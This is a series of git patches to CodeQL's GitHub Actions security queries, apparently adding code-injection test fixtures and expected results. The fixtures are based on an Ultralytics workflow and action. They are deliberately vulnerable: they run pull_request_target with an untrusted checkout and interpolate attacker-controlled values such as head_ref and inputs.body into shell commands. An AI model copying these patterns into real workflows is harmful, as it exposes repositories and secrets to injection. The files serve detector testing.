untrustedEventPropertiesDataModel(regexp, flag) and not flag = "json" and @@ -182,20 +186,24 @@ class GitHubEventJsonSource extends RemoteFlowSource { exists(Expression e, string context, string regexp | this.asExpr() = e and context = e.getExpression() and - event = e.getEnclosingWorkflow().getATriggerEvent().getName() and untrustedEventPropertiesDataModel(regexp, _) and ( // only contexts for the triggering events are considered tainted. // eg: for `pull_request`, we only consider `github.event.pull_request` + event = e.getEnclosingWorkflow().getATriggerEvent().getName() and exists(string context_prefix | contextTriggerDataModel(event, context_prefix) and normalizeExpr(context).matches("%" + context_prefix + "%") ) and normalizeExpr(context).regexpMatch("(?i).*" + wrapJsonRegexp(regexp) + ".*") or - // github.event is taintes for all triggers + // github.event is tainted for all triggers + event = e.getEnclosingWorkflow().getATriggerEvent().getName() and contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), _) and normalizeExpr(context).regexpMatch("(?i).*" + wrapJsonRegexp("\\bgithub.event\\b") + ".*") + or + not exists(e.getATriggerEvent()) and + event = "unknown" ) and flag = "json" ) From b80d3d56a364d7ddcd718126ba7ac559a3fcae64 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 9 Dec 2024 21:47:09 +0100 Subject: [PATCH 684/707] exclude Simple refereces from GitHub context --- ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 12a65a52baaf..9668fce2ae00 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -245,7 +245,8 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt | expr.(StepsExpression).getStepId() = value or - expr.(SimpleReferenceExpression).getFieldName() = value + expr.(SimpleReferenceExpression).getFieldName() = value and + not expr instanceof GitHubExpression or expr.(NeedsExpression).getNeededJobId() = value or @@ -279,7 +280,8 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { | expr.(StepsExpression).getStepId() = value or - expr.(SimpleReferenceExpression).getFieldName() = value + expr.(SimpleReferenceExpression).getFieldName() = value and + not expr instanceof GitHubExpression or expr.(NeedsExpression).getNeededJobId() = value or From bee0668cd0981df475b958469bf78d22bcd0e9d5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 9 Dec 2024 21:47:28 +0100 Subject: [PATCH 685/707] Add tests and update expected results --- .../.github/actions/action6/action.yml | 251 +++++++++++++++++ .../.github/actions/action7/action.yml | 252 ++++++++++++++++++ .../CWE-094/.github/workflows/test28.yml | 34 +++ .../CWE-094/CodeInjectionCritical.expected | 9 + .../CWE-094/CodeInjectionMedium.expected | 15 ++ .../UntrustedCheckoutCritical.expected | 4 - 6 files changed, 561 insertions(+), 4 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test28.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml b/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml new file mode 100644 index 000000000000..0048a4ca31e1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml @@ -0,0 +1,251 @@ +# Ultralytics Actions 🚀, AGPL-3.0 License https://ultralytics.com/license + +name: "Ultralytics Actions" +author: "Ultralytics" +description: "Optimize code and docs with official Ultralytics Actions for syntax, spelling, and link checks." +branding: + icon: "code" + color: "blue" +inputs: + token: + description: "GitHub token" + required: true + labels: + description: "Run issue and PR auto-labeling" + required: false + default: "false" + python: + description: "Run Python formatting" + required: false + default: "false" + markdown: + description: "Run Markdown formatting (deprecated in favor of prettier)" + required: false + default: "false" + prettier: + description: "Run Prettier formatting for JavaScript, JSX, Angular, Vue, Flow, TypeScript, CSS, HTML, JSON, GraphQL, Markdown, YAML" + required: false + default: "false" + swift: + description: "Run Swift formatting" + required: false + default: "false" + spelling: + description: "Run Spelling checks" + required: false + default: "false" + links: + description: "Run Broken Links checks" + required: false + default: "false" + summary: + description: "Run PR Summary" + required: false + default: "false" + openai_api_key: + description: "OpenAI API Key" + required: false + openai_model: + description: "OpenAI Model" + required: false + default: "gpt-4o" + first_issue_response: + description: "Example response to a new issue" + required: false + first_pr_response: + description: "Example response to a new PR" + required: false + github_username: + description: "GitHub username for commits" + required: false + default: "UltralyticsAssistant" + github_email: + description: "GitHub email for commits" + required: false + default: "web@ultralytics.com" +runs: + using: "composite" + steps: + - uses: astral-sh/setup-uv@v3 + - name: Install Dependencies + # Note tomli required for codespell with pyproject.toml + # For debug: + # python -m pip install --upgrade pip wheel + # pip install -q git+https://github.com/ultralytics/actions@main codespell tomli + run: | + packages="ultralytics-actions" + if [ "${{ inputs.spelling }}" = "true" ]; then + packages="$packages codespell tomli" + fi + + # On macOS, don't use sudo as it can cause environment issues + if [ "$(uname)" = "Darwin" ]; then + pip install -q $packages + else + sudo env "PATH=$PATH" uv pip install --system $packages + fi + + ultralytics-actions-info + shell: bash + + # Checkout Repository ---------------------------------------------------------------------------------------------- + - name: Checkout Repository + if: github.event.action != 'closed' + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name || github.repository }} + token: ${{ inputs.token }} + ref: ${{ github.head_ref || github.ref }} + fetch-depth: 0 + + # PR Summary ------------------------------------------------------------------------------------------------------- + - name: PR Summary + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.summary == 'true' && github.event.action != 'synchronize' + env: + GITHUB_TOKEN: ${{ inputs.token }} + OPENAI_API_KEY: ${{ inputs.openai_api_key }} + OPENAI_MODEL: ${{ inputs.openai_model }} + run: | + ultralytics-actions-summarize-pr + shell: bash + continue-on-error: true + + # Python formatting ------------------------------------------------------------------------------------------------ + # Ignores the following Docs rules to match Google-style docstrings: + # D100: Missing docstring in public module + # D104: Missing docstring in public package + # D203: 1 blank line required before class docstring + # D205: 1 blank line required between summary line and description + # D212: Multi-line docstring summary should start at the first line + # D213: Multi-line docstring summary should start at the second line + # D401: First line of docstring should be in imperative mood + # D406: Section name should end with a newline + # D407: Missing dashed underline after section + # D413: Missing blank line after last section + # --target-version is Python 3.8 for --extend-select UP (pyupgrade) + - name: Run Python + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.python == 'true' && github.event.action != 'closed' + run: | + ruff format \ + --line-length 120 \ + . || true + ruff check \ + --fix \ + --unsafe-fixes \ + --extend-select I,D,UP \ + --target-version py38 \ + --ignore D100,D104,D203,D205,D212,D213,D401,D406,D407,D413 \ + . || true + docformatter \ + --wrap-summaries 120 \ + --wrap-descriptions 120 \ + --pre-summary-newline \ + --close-quotes-on-newline \ + --in-place \ + --recursive \ + . + shell: bash + continue-on-error: true + + # Prettier (JavaScript, JSX, Angular, Vue, Flow, TypeScript, CSS, HTML, JSON, GraphQL, Markdown, YAML) ------------- + - name: Run Prettier + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && (inputs.prettier == 'true' || inputs.markdown == 'true') && github.event.action != 'closed' + run: | + ultralytics-actions-update-markdown-code-blocks + npm install --global prettier + npx prettier --write "**/*.{js,jsx,ts,tsx,css,less,scss,json,yml,yaml,html,vue,svelte}" '!**/*lock.{json,yaml,yml}' '!**/*.lock' '!**/model.json' + # Handle Markdown separately + find . -name "*.md" ! -path "*/docs/*" -exec npx prettier --write {} + + if [ -d "./docs" ]; then + find ./docs -name "*.md" ! -path "*/reference/*" -exec npx prettier --tab-width 4 --write {} + + fi + shell: bash + continue-on-error: true + + # - name: Fix MkDocs reference section changes + # if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && (inputs.prettier == 'true' || inputs.markdown == 'true') && github.event.action != 'closed' + # run: | + # from pathlib import Path + # for file in Path("./docs").rglob('*.md'): + # content = file.read_text() + # updated_content = content.replace(".\_","._") + # file.write_text(updated_content) + # shell: python + # continue-on-error: true + + # Swift formatting ------------------------------------------------------------------------------------------------- + - name: Run Swift Formatter + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.swift == 'true' && github.event.action != 'closed' + run: | + brew install swift-format + swift-format --in-place --recursive . + shell: bash + continue-on-error: true + + # Spelling --------------------------------------------------------------------------------------------------------- + - name: Run Codespell + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.spelling == 'true' && github.event.action != 'closed' + run: | + codespell \ + --write-changes \ + --ignore-words-list "crate,nd,ned,strack,dota,ane,segway,fo,gool,winn,commend,bloc,nam,afterall,skelton,goin" \ + --skip "*.pt,*.pth,*.torchscript,*.onnx,*.tflite,*.pb,*.bin,*.param,*.mlmodel,*.engine,*.npy,*.data*,*.csv,*pnnx*,*venv*,*translat*,*lock*,__pycache__*,*.ico,*.jpg,*.png,*.mp4,*.mov,/runs,/.git,./docs/??/*.md,./docs/mkdocs_??.yml" + shell: bash + continue-on-error: true + + # Autolabel Issues and PRs (run before commit changes in case commit fails) ---------------------------------------- + - name: Autolabel Issues and PRs + if: inputs.labels == 'true' && (github.event.action == 'opened' || github.event.action == 'created') + env: + GITHUB_TOKEN: ${{ inputs.token }} + FIRST_ISSUE_RESPONSE: ${{ inputs.first_issue_response }} + FIRST_PR_RESPONSE: ${{ inputs.first_pr_response }} + OPENAI_API_KEY: ${{ inputs.openai_api_key }} + OPENAI_MODEL: ${{ inputs.openai_model }} + run: | + ultralytics-actions-first-interaction + shell: bash + continue-on-error: true + + # Commit Changes --------------------------------------------------------------------------------------------------- + - name: Commit and Push Changes + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && github.event.action != 'closed' + run: | + git config --global user.name "${{ inputs.github_username }}" + git config --global user.email "${{ inputs.github_email }}" + git pull origin ${{ github.head_ref || github.ref }} + git add . + git reset HEAD -- .github/workflows/ # workflow changes are not permitted with default token + if ! git diff --staged --quiet; then + git commit -m "Auto-format by https://ultralytics.com/actions" + git push + else + echo "No changes to commit" + fi + shell: bash + continue-on-error: false + + # Broken links ----------------------------------------------------------------------------------------------------- + - name: Broken Link Checker + if: inputs.links == 'true' && github.event.action != 'closed' + uses: lycheeverse/lychee-action@v2.0.2 + with: + # Check all markdown and html files in repo. Ignores the following status codes to reduce false positives: + # - 403(OpenVINO, "forbidden") + # - 429(Instagram, "too many requests") + # - 500(Zenodo, "cached") + # - 502(Zenodo, "bad gateway") + # - 999(LinkedIn, "unknown status code") + args: | + --scheme https + --timeout 60 + --insecure + --accept 403,429,500,502,999 + --exclude-all-private + --exclude "https?://(www\.)?(github\.com|linkedin\.com|twitter\.com|instagram\.com|kaggle\.com|fonts\.gstatic\.com|url\.com)" + "./**/*.md" + "./**/*.html" + token: ${{ inputs.token }} + output: ../lychee/results.md + fail: true + continue-on-error: false diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml b/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml new file mode 100644 index 000000000000..8bffcdc4020e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml @@ -0,0 +1,252 @@ +# Ultralytics Actions 🚀, AGPL-3.0 License https://ultralytics.com/license + +name: "Ultralytics Actions" +author: "Ultralytics" +description: "Optimize code and docs with official Ultralytics Actions for syntax, spelling, and link checks." +branding: + icon: "code" + color: "blue" +inputs: + token: + description: "GitHub token" + required: true + labels: + description: "Run issue and PR auto-labeling" + required: false + default: "false" + python: + description: "Run Python formatting" + required: false + default: "false" + markdown: + description: "Run Markdown formatting (deprecated in favor of prettier)" + required: false + default: "false" + prettier: + description: "Run Prettier formatting for JavaScript, JSX, Angular, Vue, Flow, TypeScript, CSS, HTML, JSON, GraphQL, Markdown, YAML" + required: false + default: "false" + swift: + description: "Run Swift formatting" + required: false + default: "false" + spelling: + description: "Run Spelling checks" + required: false + default: "false" + links: + description: "Run Broken Links checks" + required: false + default: "false" + summary: + description: "Run PR Summary" + required: false + default: "false" + openai_api_key: + description: "OpenAI API Key" + required: false + openai_model: + description: "OpenAI Model" + required: false + default: "gpt-4o" + first_issue_response: + description: "Example response to a new issue" + required: false + first_pr_response: + description: "Example response to a new PR" + required: false + github_username: + description: "GitHub username for commits" + required: false + default: "UltralyticsAssistant" + github_email: + description: "GitHub email for commits" + required: false + default: "web@ultralytics.com" +runs: + using: "composite" + steps: + - uses: astral-sh/setup-uv@v3 + - name: Install Dependencies + # Note tomli required for codespell with pyproject.toml + # For debug: + # python -m pip install --upgrade pip wheel + # pip install -q git+https://github.com/ultralytics/actions@main codespell tomli + run: | + packages="ultralytics-actions" + if [ "${{ inputs.spelling }}" = "true" ]; then + packages="$packages codespell tomli" + fi + + # On macOS, don't use sudo as it can cause environment issues + if [ "$(uname)" = "Darwin" ]; then + pip install -q $packages + else + sudo env "PATH=$PATH" uv pip install --system $packages + fi + + ultralytics-actions-info + shell: bash + + # Checkout Repository ---------------------------------------------------------------------------------------------- + - name: Checkout Repository + if: github.event.action != 'closed' + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name || github.repository }} + token: ${{ inputs.token }} + ref: ${{ github.head_ref || github.ref }} + fetch-depth: 0 + + # PR Summary ------------------------------------------------------------------------------------------------------- + - name: PR Summary + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.summary == 'true' && github.event.action != 'synchronize' + env: + GITHUB_TOKEN: ${{ inputs.token }} + OPENAI_API_KEY: ${{ inputs.openai_api_key }} + OPENAI_MODEL: ${{ inputs.openai_model }} + run: | + ultralytics-actions-summarize-pr + shell: bash + continue-on-error: true + + # Python formatting ------------------------------------------------------------------------------------------------ + # Ignores the following Docs rules to match Google-style docstrings: + # D100: Missing docstring in public module + # D104: Missing docstring in public package + # D203: 1 blank line required before class docstring + # D205: 1 blank line required between summary line and description + # D212: Multi-line docstring summary should start at the first line + # D213: Multi-line docstring summary should start at the second line + # D401: First line of docstring should be in imperative mood + # D406: Section name should end with a newline + # D407: Missing dashed underline after section + # D413: Missing blank line after last section + # --target-version is Python 3.8 for --extend-select UP (pyupgrade) + - name: Run Python + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.python == 'true' && github.event.action != 'closed' + run: | + ruff format \ + --line-length 120 \ + . || true + ruff check \ + --fix \ + --unsafe-fixes \ + --extend-select I,D,UP \ + --target-version py38 \ + --ignore D100,D104,D203,D205,D212,D213,D401,D406,D407,D413 \ + . || true + docformatter \ + --wrap-summaries 120 \ + --wrap-descriptions 120 \ + --pre-summary-newline \ + --close-quotes-on-newline \ + --in-place \ + --recursive \ + . + shell: bash + continue-on-error: true + + # Prettier (JavaScript, JSX, Angular, Vue, Flow, TypeScript, CSS, HTML, JSON, GraphQL, Markdown, YAML) ------------- + - name: Run Prettier + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && (inputs.prettier == 'true' || inputs.markdown == 'true') && github.event.action != 'closed' + run: | + ultralytics-actions-update-markdown-code-blocks + npm install --global prettier + npx prettier --write "**/*.{js,jsx,ts,tsx,css,less,scss,json,yml,yaml,html,vue,svelte}" '!**/*lock.{json,yaml,yml}' '!**/*.lock' '!**/model.json' + # Handle Markdown separately + find . -name "*.md" ! -path "*/docs/*" -exec npx prettier --write {} + + if [ -d "./docs" ]; then + find ./docs -name "*.md" ! -path "*/reference/*" -exec npx prettier --tab-width 4 --write {} + + fi + shell: bash + continue-on-error: true + + # - name: Fix MkDocs reference section changes + # if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && (inputs.prettier == 'true' || inputs.markdown == 'true') && github.event.action != 'closed' + # run: | + # from pathlib import Path + # for file in Path("./docs").rglob('*.md'): + # content = file.read_text() + # updated_content = content.replace(".\_","._") + # file.write_text(updated_content) + # shell: python + # continue-on-error: true + + # Swift formatting ------------------------------------------------------------------------------------------------- + - name: Run Swift Formatter + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.swift == 'true' && github.event.action != 'closed' + run: | + brew install swift-format + swift-format --in-place --recursive . + shell: bash + continue-on-error: true + + # Spelling --------------------------------------------------------------------------------------------------------- + - name: Run Codespell + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.spelling == 'true' && github.event.action != 'closed' + run: | + codespell \ + --write-changes \ + --ignore-words-list "crate,nd,ned,strack,dota,ane,segway,fo,gool,winn,commend,bloc,nam,afterall,skelton,goin" \ + --skip "*.pt,*.pth,*.torchscript,*.onnx,*.tflite,*.pb,*.bin,*.param,*.mlmodel,*.engine,*.npy,*.data*,*.csv,*pnnx*,*venv*,*translat*,*lock*,__pycache__*,*.ico,*.jpg,*.png,*.mp4,*.mov,/runs,/.git,./docs/??/*.md,./docs/mkdocs_??.yml" + shell: bash + continue-on-error: true + + # Autolabel Issues and PRs (run before commit changes in case commit fails) ---------------------------------------- + - name: Autolabel Issues and PRs + if: inputs.labels == 'true' && (github.event.action == 'opened' || github.event.action == 'created') + env: + GITHUB_TOKEN: ${{ inputs.token }} + FIRST_ISSUE_RESPONSE: ${{ inputs.first_issue_response }} + FIRST_PR_RESPONSE: ${{ inputs.first_pr_response }} + OPENAI_API_KEY: ${{ inputs.openai_api_key }} + OPENAI_MODEL: ${{ inputs.openai_model }} + run: | + ultralytics-actions-first-interaction + shell: bash + continue-on-error: true + + # Commit Changes --------------------------------------------------------------------------------------------------- + - name: Commit and Push Changes + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && github.event.action != 'closed' + run: | + git config --global user.name "${{ inputs.github_username }}" + git config --global user.email "${{ inputs.github_email }}" + # this action is not called in the test + git pull origin ${{ github.head_ref || github.ref }} + git add . + git reset HEAD -- .github/workflows/ # workflow changes are not permitted with default token + if ! git diff --staged --quiet; then + git commit -m "Auto-format by https://ultralytics.com/actions" + git push + else + echo "No changes to commit" + fi + shell: bash + continue-on-error: false + + # Broken links ----------------------------------------------------------------------------------------------------- + - name: Broken Link Checker + if: inputs.links == 'true' && github.event.action != 'closed' + uses: lycheeverse/lychee-action@v2.0.2 + with: + # Check all markdown and html files in repo. Ignores the following status codes to reduce false positives: + # - 403(OpenVINO, "forbidden") + # - 429(Instagram, "too many requests") + # - 500(Zenodo, "cached") + # - 502(Zenodo, "bad gateway") + # - 999(LinkedIn, "unknown status code") + args: | + --scheme https + --timeout 60 + --insecure + --accept 403,429,500,502,999 + --exclude-all-private + --exclude "https?://(www\.)?(github\.com|linkedin\.com|twitter\.com|instagram\.com|kaggle\.com|fonts\.gstatic\.com|url\.com)" + "./**/*.md" + "./**/*.html" + token: ${{ inputs.token }} + output: ../lychee/results.md + fail: true + continue-on-error: false diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test28.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test28.yml new file mode 100644 index 000000000000..dbc0137ed5b2 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test28.yml @@ -0,0 +1,34 @@ +# Ultralytics 🚀 - AGPL-3.0 License https://ultralytics.com/license +# Ultralytics Actions https://github.com/ultralytics/actions +# This workflow automatically formats code and documentation in PRs to official Ultralytics standards + +name: Ultralytics Actions + +on: + issues: + types: [opened, edited] + discussion: + types: [created] + pull_request_target: + branches: [main] + types: [opened, closed, synchronize, review_requested] + +permissions: + contents: write + +jobs: + format: + runs-on: ubuntu-latest + steps: + - name: Run Ultralytics Formatting + uses: ./.github/actions/action6 + with: + token: ${{ secrets._GITHUB_TOKEN }} # note GITHUB_TOKEN automatically generated + labels: true # autolabel issues and PRs + python: true # format Python code and docstrings + prettier: true # format YAML, JSON, Markdown and CSS + spelling: true # check spelling + links: false # check broken links + summary: true # print PR summary with GPT4o (requires 'openai_api_key') + openai_api_key: ${{ secrets.OPENAI_API_KEY }} + first_issue_response: "foo" diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index deee6f5202bc..b2afe0577aab 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -230,6 +230,8 @@ edges | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo "::set-output name=pr_number::$(> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | ${{ steps.git-commit.outputs.file-list }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index e13c2b80a72f..605fa2924ff8 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -230,6 +230,8 @@ edges | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo "::set-output name=pr_number::$( Date: Mon, 9 Dec 2024 21:48:17 +0100 Subject: [PATCH 686/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index d938d0617e9a..dd83f7052196 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.2.1 +version: 0.2.2 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 99ac2c740119..90c64f0b7469 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.2.1 +version: 0.2.2 groups: [actions, queries] suites: codeql-suites extractor: javascript From 455afc2bb2cdaa894e516695dd14720240b6d879 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 13 Dec 2024 16:49:17 +0100 Subject: [PATCH 687/707] Expect external workflows and actions in .github/workflow/external and .github/actions/external --- ql/lib/codeql/actions/Helper.qll | 6 +- ql/lib/codeql/actions/ast/internal/Ast.qll | 4 +- .../.github/actions/clone-repo/action.yaml | 1 + .../external/ultralytics/actions/action.yaml | 258 ++++++++++++++++++ .../.github/workflows/publishResults.yml | 0 .../.github/workflows/reusable-workflow.yml | 0 .../CWE-094/.github/workflows/test29.yml | 36 +++ .../CWE-094/CodeInjectionCritical.expected | 78 +++--- .../CWE-094/CodeInjectionMedium.expected | 64 +++-- .../TestRepo/.github/workflows/formal.yml | 0 .../TestRepo/.github/workflows/reusable.yml | 0 .../UntrustedCheckoutCritical.expected | 8 +- 12 files changed, 383 insertions(+), 72 deletions(-) rename ql/test/query-tests/Security/CWE-094/.github/{reusable_workflows => actions/external}/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml (99%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml rename ql/test/query-tests/Security/CWE-094/.github/{reusable_workflows => workflows/external}/TestOrg/TestRepo/.github/workflows/publishResults.yml (100%) rename ql/test/query-tests/Security/CWE-094/.github/{reusable_workflows => workflows/external}/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml (100%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test29.yml rename ql/test/query-tests/Security/CWE-829/.github/{reusable_workflows => workflows/external}/TestOrg/TestRepo/.github/workflows/formal.yml (100%) rename ql/test/query-tests/Security/CWE-829/.github/{reusable_workflows => workflows/external}/TestOrg/TestRepo/.github/workflows/reusable.yml (100%) diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index fb6fdf2d74b8..48b70061ec0f 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -50,10 +50,12 @@ string getRepoRoot() { .getRelativePath() .prefix(w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") + 1) and // exclude workflow_enum reusable workflows directory root - not result.indexOf(".github/reusable_workflows/") > -1 + not result.indexOf(".github/workflows/external/") > -1 and + not result.indexOf(".github/actions/external/") > -1 or not w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") > 0 and - not w.getLocation().getFile().getRelativePath().indexOf(".github/reusable_workflows") > -1 and + not w.getLocation().getFile().getRelativePath().indexOf(".github/workflows/external/") > -1 and + not w.getLocation().getFile().getRelativePath().indexOf(".github/actions/external/") > -1 and result = "" ) } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index e331eff9bd29..77d2bcef3cdf 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -425,7 +425,7 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { .replaceAll(getRepoRoot(), "") .replaceAll("/action.yml", "") .replaceAll("/action.yaml", "") - .replaceAll(".github/reusable_workflows/", "") + .replaceAll(".github/actions/external/", "") } private predicate hasExplicitSecretAccess() { @@ -550,7 +550,7 @@ class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { .getFile() .getRelativePath() .replaceAll(getRepoRoot(), "") - .replaceAll(".github/reusable_workflows/", "") + .replaceAll(".github/workflows/external/", "") } } diff --git a/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml b/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml similarity index 99% rename from ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml rename to ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml index 75d7e79c1e45..398c0ee6a6e1 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml +++ b/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml @@ -44,3 +44,4 @@ runs: ref: refs/pull/${{ github.event.number }}/merge fetch-depth: ${{ inputs.fetch-depth }} + diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml b/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml new file mode 100644 index 000000000000..a8019fbbf145 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml @@ -0,0 +1,258 @@ +# Ultralytics Actions 🚀, AGPL-3.0 License https://ultralytics.com/license + +name: "Ultralytics Actions" +author: "Ultralytics" +description: "Optimize code and docs with official Ultralytics Actions for syntax, spelling, and link checks." +branding: + icon: "code" + color: "blue" +inputs: + token: + description: "GitHub token" + required: true + labels: + description: "Run issue and PR auto-labeling" + required: false + default: "false" + python: + description: "Run Python formatting" + required: false + default: "false" + markdown: + description: "Run Markdown formatting (deprecated in favor of prettier)" + required: false + default: "false" + prettier: + description: "Run Prettier formatting for JavaScript, JSX, Angular, Vue, Flow, TypeScript, CSS, HTML, JSON, GraphQL, Markdown, YAML" + required: false + default: "false" + swift: + description: "Run Swift formatting" + required: false + default: "false" + spelling: + description: "Run Spelling checks" + required: false + default: "false" + links: + description: "Run Broken Links checks" + required: false + default: "false" + summary: + description: "Run PR Summary" + required: false + default: "false" + openai_api_key: + description: "OpenAI API Key" + required: false + openai_model: + description: "OpenAI Model" + required: false + default: "gpt-4o" + first_issue_response: + description: "Example response to a new issue" + required: false + first_pr_response: + description: "Example response to a new PR" + required: false + github_username: + description: "GitHub username for commits" + required: false + default: "UltralyticsAssistant" + github_email: + description: "GitHub email for commits" + required: false + default: "web@ultralytics.com" + body: + description: "PR body" + required: false + default: "" +runs: + using: "composite" + steps: + - uses: astral-sh/setup-uv@v3 + - name: Install Dependencies + # Note tomli required for codespell with pyproject.toml + # For debug: + # python -m pip install --upgrade pip wheel + # pip install -q git+https://github.com/ultralytics/actions@main codespell tomli + run: | + packages="ultralytics-actions" + if [ "${{ inputs.spelling }}" = "true" ]; then + packages="$packages codespell tomli" + fi + + # On macOS, don't use sudo as it can cause environment issues + if [ "$(uname)" = "Darwin" ]; then + pip install -q $packages + else + sudo env "PATH=$PATH" uv pip install --system $packages + fi + + ultralytics-actions-info + shell: bash + - shell: bash + run: | + echo "${{ inputs.body }}" + + # Checkout Repository ---------------------------------------------------------------------------------------------- + - name: Checkout Repository + if: github.event.action != 'closed' + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name || github.repository }} + token: ${{ inputs.token }} + ref: ${{ github.head_ref || github.ref }} + fetch-depth: 0 + + # PR Summary ------------------------------------------------------------------------------------------------------- + - name: PR Summary + if: (github.event_name == 'pull_request' || github.event_name == 